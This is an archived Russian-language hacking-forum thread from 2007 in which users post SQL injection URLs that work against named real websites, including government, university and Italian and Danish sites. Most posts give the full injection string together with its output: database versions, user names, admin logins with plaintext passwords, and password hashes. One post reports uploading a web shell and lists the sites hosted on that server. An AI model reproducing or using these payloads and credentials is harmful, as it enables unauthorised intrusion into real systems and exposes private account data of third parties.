ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #3861  
Старый 26.11.2007, 22:24
ZAMUT
Members of Antichat - Level 5
Регистрация: 24.10.2007
Сообщений: 256
Провел на форуме:
6905523

Репутация: 1174
По умолчанию

Цитата:
Сообщение от Mike 007  
помогите найти, куда пароль вводить для админа. хочу изменить главную стр.
З.Ы: если кто за них болеет, не обижайтесь
Дефэйсы запрещаются АНТИЧАТОМ!
 
Ответить с цитированием

  #3862  
Старый 26.11.2007, 22:29
Mike 007
Познающий
Регистрация: 04.04.2007
Сообщений: 54
Провел на форуме:
189215

Репутация: 86
Talking

zamut
понятно, никаких дефейсов!
за что ж вы так с моей репой?

Последний раз редактировалось Mike 007; 26.11.2007 в 22:39..
 
Ответить с цитированием

  #3863  
Старый 27.11.2007, 01:37
Fugitif
Постоянный
Регистрация: 23.09.2007
Сообщений: 416
Провел на форуме:
1781065

Репутация: 869
По умолчанию

Код:
http://www2a.cdc.gov/phlp/dailynews/default.asp?specific=1%20and%201=convert(int,@@version)--
Цитата:
'Microsoft SQL Server 2000 - 8.00.818 (Intel X86) May 31 2003 16:08:15 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.0 (Build 2195: Service Pack 4) '
Код:
http://www2a.cdc.gov/phlp/dailynews/default.asp?specific=1%20and%201=convert(int,@@servername)--
Цитата:
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'QPHP-ATL-PROD1' to a column of data type int.
 
Ответить с цитированием

  #3864  
Старый 27.11.2007, 02:41
ZAMUT
Members of Antichat - Level 5
Регистрация: 24.10.2007
Сообщений: 256
Провел на форуме:
6905523

Репутация: 1174
По умолчанию

www.pose.is

БД 4'ой ветки
Код:
http://www.pose.is/fullfrettir.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat_ws(0x3a,username,password),14,15,16,17,18,19+from+users+--+
Код:
admin:123fazmo
 
Ответить с цитированием

  #3865  
Старый 27.11.2007, 07:18
1NtR0
Участник форума
Регистрация: 14.04.2007
Сообщений: 197
Провел на форуме:
1122391

Репутация: 209
По умолчанию

Еда

Код:
http://www.cviog.uga.edu/spotlight/news/item.php?id=-241+union+select+user(),database(),3,4,5,6,7,8,version()/*
user() webmstr@localhost
database() news
version() 4.0.18


Код:
http://www.ic.usu.edu/forum/topic.php?forum_id=-1+union+select+concat_ws(char(95, 95, 95),user(),version(),database())/*
user() root2@localhost
database() ic_forum
version() 4.1.20
 
Ответить с цитированием

  #3866  
Старый 27.11.2007, 13:36
TheSoul
Познающий
Регистрация: 12.11.2007
Сообщений: 94
Провел на форуме:
4789789

Репутация: 71
По умолчанию

http://www.sportsmindskills.com

Код:
http://www.sportsmindskills.com/sport.php?id=5+union+select+Email_address,User_password+from+user/*
http://www.green.ru
Код:
http://www.green.ru/news/event.htm?id=63+union+select+1,2,3,login,password,6,7+from+users/*
 
Ответить с цитированием

  #3867  
Старый 27.11.2007, 15:47
fRg
Участник форума
Регистрация: 28.12.2006
Сообщений: 111
Провел на форуме:
500695

Репутация: 524
Отправить сообщение для fRg с помощью ICQ
По умолчанию

Привет, Италия!

everyeye.it
Код:
http://www.everyeye.it/anime/articolo.asp?id=-1+union+select+1,2,3,concat(aes_decrypt(aes_encrypt(version(),0x71),0x71),0x3a,aes_decrypt(aes_encrypt(database(),0x71),0x71),0x3a,aes_decrypt(aes_encrypt(user(),0x71),0x71))/*
4.1.18-NT:EVERYEYE_IT:ADMIN@LOCALHOSТ

momentosera.com
Код:
http://www.momentosera.com/articolo.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,concat(aes_decrypt(aes_encrypt(version(),0x71),0x71),0x3a,aes_decrypt(aes_encrypt(database(),0x71),0x71),0x3a,aes_decrypt(aes_encrypt(user(),0x71),0x71))/*
4.1.14-nt:momentosera1:ms@217.72.103.15

ilmascalzone.it
Код:
http://www.ilmascalzone.it/articolo.php?id=-1+union+select+1,2,3,4,concat_ws(0x3a,version(),database(),user()),6,7,8/*
4.0.27-standard-log:Sql17365_3:Sql17365@62.149.140.32

sapereperfare.it
Код:
http://www.sapereperfare.it/articoloExt.php?id=-1%20union%20select%201,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25/*&link=17
4.0.24_Debian-10sarge2:sapereperfa11865:sapereperfa11865@wnx-20.seeweb.it

uomo-libero.com
Код:
http://www.uomo-libero.com/autore.php?id=-1+union+select+1,2,3,4,concat_ws(0x3a,version(),database(),user()),6/*&onlyfull=0
4.0.24-standard-log:uomolibero:uomolibero@localhost

Админка:
Код:
http://www.uomo-libero.com/admin/
Админы:
Код:
http://www.uomo-libero.com/autore.php?id=-1+union+select+1,2,3,4,concat_ws(0x3a,login,password),6+from+users+limit+0,1/*&onlyfull=0
[Логин : Пасс] :
Код:
uomolibero:u0m0l1b
mahutg:okamilykos
Залил шелл:
Код:
http://www.uomo-libero.com/images/file/rs.php
Оказалось на серваке крутятся сайты:
Код:
thenoiseisthemassage.org
unsedicesimo.corraini.com
www.creativenetwork.it
www.affiliate-blog.org
www.affiliatemagazine.net
www.affiliazione.info
www.ajax-blog.com
www.contactwizard.it
www.corraini.com
www.creativepress.it
www.festivaletteratura.it
www.ggindustriegrafiche.com
www.intranet-blog.com
www.mantuaconnection.com
www.narninews.it
www.onajax.com
www.passionesaxo.com
www.piazzalberti.org
www.pochimaledettiesubito.BCK
www.pochimaledettiesubito.com
www.quicomincialalettura.org
www.risorse-gratis.it
www.sacconicase.it
www.ternieprovincia.com
www.testounicoprivacy.it
www.uomo-libero.com
www.webhosting-gratis.it
www.writeonit.org
Люди - будьте добрыми хацкерами!!!
 
Ответить с цитированием

  #3868  
Старый 27.11.2007, 16:39
-=lebed=-
Флудер
Регистрация: 21.06.2006
Сообщений: 3,193
Провел на форуме:
12702287

Репутация: 4738


По умолчанию

Powered By Tilde CMS довольно дырявая CMS, можно найти кучу скулей, как в старых так и новых версиях.

Пример:www.meditalklinik.dk
Код:
_http://www.meditalklinik.dk/index.php?id=-1+union+select+1,concat(version(),0x3a,user(),0x3a,database()),3,4,5,6,7,8,9/*
5.0.45:meditalkli@linux2.wannafind.dk:meditalklini k_dk_db
version=>5 ->
Код:
http://www.meditalklinik.dk/index.php?id=-1+union+select+1,table_name,3,4,5,6,7,8,9+from+information_schema.tables/*
Смотрим таблицы, меняя лимит:
Код:
_http://www.meditalklinik.dk/index.php?id=-1+union+select+1,table_name,3,4,5,6,7,8,9+from+information_schema.tables+limit+1,1/*
Всего 23 таблицы:
CHARACTER_SETS
COLLATIONS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
KEY_COLUMN_USAGE
PROFILING
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
STATISTICS
TABLES
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TRIGGERS
USER_PRIVILEGES
VIEWS
ArtikelLink
ArtikelMain
ArtikelParaLinksRelation
ArtikelParaRelation
ArtikelParagraf
Menu_statisk
 
Ответить с цитированием

  #3869  
Старый 27.11.2007, 19:51
Iceangel_
Members of Antichat - Level 5
Регистрация: 09.07.2006
Сообщений: 553
Провел на форуме:
7561206

Репутация: 1861


По умолчанию

http://masteroff.org
Код:
http://masteroff.org/edit.php?q=44691+UNION+SELECT+1,pass,3,4,5,6,7,8,9,10,11+from+users/*
login: admin
hash: 5416d7cd6ef195a0f7622a9c56b55e84
pass: 1q2w3e4r
 
Ответить с цитированием

  #3870  
Старый 27.11.2007, 20:01
Fata1ex
Постоянный
Регистрация: 12.12.2006
Сообщений: 906
Провел на форуме:
4205500

Репутация: 930


По умолчанию

edu

Код:
http://www.dukemednews.duke.edu/av/video.php?id=-1+union+select+1111111,password+from+mysql.user/*
web@vml-news.duhs.duke.edu:4.0.18:news

web:623460e26f081bbc




Код:
http://geology.osu.edu/faculty_bios.php?id=-27+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31/* //Есть доступ к mysql.user
web_bot@emerald.geology.ohio-state.edu:5.0.22:geosci_web
# 1cd219690c8c93cd
# root


Slip выкладывал вроде почти ее =/

Последний раз редактировалось Fata1ex; 27.11.2007 в 20:08..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ